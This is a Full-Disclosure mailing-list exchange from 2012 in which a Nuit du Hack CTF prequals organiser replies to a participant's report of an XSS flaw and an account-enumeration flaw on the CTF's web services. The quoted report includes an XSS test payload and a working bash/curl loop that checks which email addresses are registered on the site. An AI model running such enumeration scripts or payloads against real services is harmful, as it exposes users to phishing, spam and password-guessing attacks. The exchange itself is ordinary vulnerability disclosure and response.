Hi klondike,
> PS: What I wonder now is, are the guys behind the CTF reading Full-disclosure? I guess you now have your answer. > The guys have a cool XSS injection on the fake webmail service which can be exploited with a properly crafted subject You're right, and it has been fixed during the prequals. Anyway, this vulnerability is minor because teams couldn't send emails to each others. At least, you can pwn your own web browser. For the last vuln mentionned, we were aware of it. Guys who wrote the code were seriously slapped. Damien, NDH prequals team -- Damien Cauquil Directeur de Recherche CEH, CHFI, ECSA, CEI Tél. : +33 (0)1 78 76 58 21 Fax.: +33 (0)1 40 12 74 41 Sysdream IT Security Services 108, av. Gabriel Péri 93400 Saint Ouen http://www.sysdream.com/ Le samedi 24 mars 2012 à 05:54 +0100, klondike a écrit : > El 24/03/12 05:27, klondike escribió: > > > So I was bored with the nuit du hack prequals and decided to test a > > bit the e-mail service. > > > > The guys have a cool XSS injection on the fake webmail service which > > can be exploited with a properly crafted subject (i.e. > > <script>alert('Hello!');</script> ). I thought the guys behind nuit > > du hack were a bit more serious than this... > > > > klondike > > > > BTW and on completely unrelated note there is an attack which could > allow an attacker to guess the addresses of the participants as long > as they are on a database owned by him. This attack works by > consulting the page as if it were a yes/no oracle and using the > results to know wether an address is on the page database or not. > > Usages of the attack? Well, trying to guess participants passwords, > phising attacks, spamming ... Pick your choice xD > > And as with any good full disclosure here you go a nice script to > exploit it: > while read email; do curl -s -o- > http://prequals.nuitduhack.com/rememberme.php -d "mail=$email" | fgrep > '<div class="error">This mail doesn'\''t correspond to any > account</div>' > /dev/null && echo Failure || echo "$email"; done > > Well don't be bad with it, participants have no fault of this, > > klondike > > PS: What I wonder now is, are the guys behind the CTF reading > Full-disclosure? > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/